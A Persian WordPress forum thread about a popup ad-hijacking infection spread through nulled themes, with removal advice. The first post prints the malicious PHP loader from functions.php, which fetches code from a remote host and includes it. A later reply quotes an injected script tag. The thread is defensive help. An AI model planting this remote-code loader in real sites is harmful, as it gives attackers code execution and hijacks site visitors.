رفتن به مطلب

ویروس پاپ آپ وردپرس go.pub2srv.com


master89

پست های پیشنهاد شده

دوستان سلام

یک ویروس جدید اومده برای وردپرس که تبلیغات دزدید میکنه. به این صورت که پاپ آپ کلیکی باز میکنه و توی موبایل بدون کلیک پاپ آپ میذاره.

جالبش اینجاس که روی آی پی Admin وردپرس پاپ آپ نداره و حتی کد هم نمیتونید پیدا کنید!

شما میتونید از "پنجره ناشناس" فایرفاکس سایت خودتون رو باز کنید و کد و پاپ آپ رو ببینید. اما باز هم اگه با FTP برید داخل همون صفحه و بخواید کد رو پاک کنید. کد مخفی میشه. به این صورت که با هر بار بارگذاری صفحه کد از جایی بازخوانی میشه.

توی انجمن های فارسی که بحثی ازش نشده فکر کنم، توی انجمن های خارجی هم بحث شده اما جوابی دریافت نشده.

صفحه اصلی تبلیغ دزد: go.pub2srv.com هست. که هر بار لینک های تبلیغاتی متفاوتی همراه خودش میتونه داشته باشه. راه های زیادی برای از بین بردنش هست. اما باز بر میگرده و به مرور بیشتر میشه.

نکته آخر : این ویروس با قالب های نال شده و غیر قانونی وارد وبسایت شما میشه. معمولا هم ارائه دهنده این قالب ها سایت vestatheme هست که اکثر وبسایت هایی که قالب های تجاری رو رایگان برای دانلود میذارن، از این وبسایت دریافت میکنند (پس اکثر سایت ها خطرناک شدن)

آموزش حذف ویروس :

اول سایتتون رو اینجا وارد کنید و چک کنید

https://sitecheck.sucuri.net/  

حالا برید داخل فلدر قالبتون / فایل function.php رو پیدا کنید و ویرایش کنید

و قطعه کد زیر رو ازش حذف کنید



if ( ! function_exists( 'wp_temp_setup' ) ) {  
$path=$_SERVER['HTTP_HOST'].$_SERVER[REQUEST_URI];

if($tmpcontent = @file_get_contents("http://www.aotson.com/code.php?i=".$path))
{

function wp_temp_setup($phpCode) {
    $tmpfname = tempnam(sys_get_temp_dir(), "wp_temp_setup");
    $handle = fopen($tmpfname, "w+");
    fwrite($handle, "<?php\n" . $phpCode);
    fclose($handle);
    include $tmpfname;
    unlink($tmpfname);
    return get_defined_vars();
}

extract(wp_temp_setup($tmpcontent));
}
}

?>

حالا افزونه  Exploit Scanner رو نصب کنید و اسکن کنید. پس از پایان اسکن ctrl+f رو بزنید و go.pub رو جستجو کنید. اگر نبود، یعنی همه چیز درسته.

(این افزونه کد های مخفی رو پیدا میکنه و نمایش میده)

سپاس

ویرایش شده توسط مهدی
لینک به ارسال
  • 1 سال بعد...

سلام علیکم

 

سایت ما هم به این مسئله دچار شده و متأسفاه روشی که فرمودین جواب نداد (این سایت ماست)

اگه سورس قالب رو ملاحظه بفرمائید ظاهرا یک فایل جاوا اسکریپت هست که داره تبلیغات پاپ آپ میگیره و با آیدی ادمین سایت چیزی مشخص نیست فقط سایر کاربران می ببینند...

اینم فایل مخرب که البته با فاصله می نویسم تا گوگل صفحه رو بلاک نکنه:

<script src='h t t p s:// cdn. examhome. net/ cdn. j s ? v e r = 1 . 0 . 5 ' type='text/java s c r i p t'></script></p>
لینک به ارسال
  • 1 سال بعد...

سلام دوستان
 

من قالب انفولد دارم و و وقتی مطالب سایت و باز میکنم پاپ آپ سایتای مختلف مثل allow-space دات کام میاد بالا.تا الان چندبار کل فایلا رو پاک کردن و دوباره بک آپمو دیتابیس ریختم.با تمام آنتی ویروس ها هم چک کردم و هیچ مشکلی گزارش نمیشه.فایلهای فانکشن هم زیرو رو کردم کد نامربوطی پیدا نکردم.نمیدونم دیگه چیکار کنم.ممنون میشم اگه کسی بتونه راهنماییم کنه.

photo_2019-12-01_18-32-06.jpg

لینک به ارسال

سلام

به انجمن خوش اومدین دوست عزیز

چون نسخه اصلی رو نصب نکردید و نسخه نال شده و پر از ویروس روی سرورتون هست.

لینک به ارسال
  • 7 ماه بعد...
در در ۱۳۹۸/۹/۲۰ در 14:17، Morteza گفته است :

سلام

به انجمن خوش اومدین دوست عزیز

چون نسخه اصلی رو نصب نکردید و نسخه نال شده و پر از ویروس روی سرورتون هست.

نه اتفاقا من از قالب اصلی Divi استفاده می کنم و پلاگین نال شده ای هم نداشتم اما درگیر این مشکل شدم.

چهار تا فایل آلوده رو هم از طریق اسکن سمت سرور پیدا و حذف کردم و همینطور امنیت سایت رو هم بالا بردم و فایل های وردپرس رو هم جایگزین کردم ولی باز به مشکل برخوردم.

لینک به ارسال
در 7 ساعت قبل، یونس گفته است :

از خود شرکت الگانت تم به صورت مستقیم خریداری کردم.

سلام. لزوما همیشه از قالب نیست، قالبهای پرفروش هدف هکرها هستن، ممکنه افزونه نال شده داشتید و یا حتی یکی از افزونه ها باگ داشته یا بروز نبوده. کلا باید بصورت مداوم وردپرس رو بررسی کنید و آخرین اخبار رو هم از مراجعی مثل وبسایت رسمی وردفنس دنبال کنید.

لینک به ارسال

به گفتگو بپیوندید

هم اکنون می توانید مطلب خود را ارسال نمایید و بعداً ثبت نام کنید. اگر حساب کاربری دارید، برای ارسال با حساب کاربری خود اکنون وارد شوید .

مهمان
ارسال پاسخ به این موضوع ...

×   شما در حال چسباندن محتوایی با قالب بندی هستید.   حذف قالب بندی

  تنها استفاده از 75 اموجی مجاز می باشد.

×   لینک شما به صورت اتوماتیک جای گذاری شد.   نمایش به صورت لینک

×   محتوای قبلی شما بازگردانی شد.   پاک کردن محتوای ویرایشگر

×   شما مستقیما نمی توانید تصویر خود را قرار دهید. یا آن را اینجا بارگذاری کنید یا از یک URL قرار دهید.

×
×
  • اضافه کردن...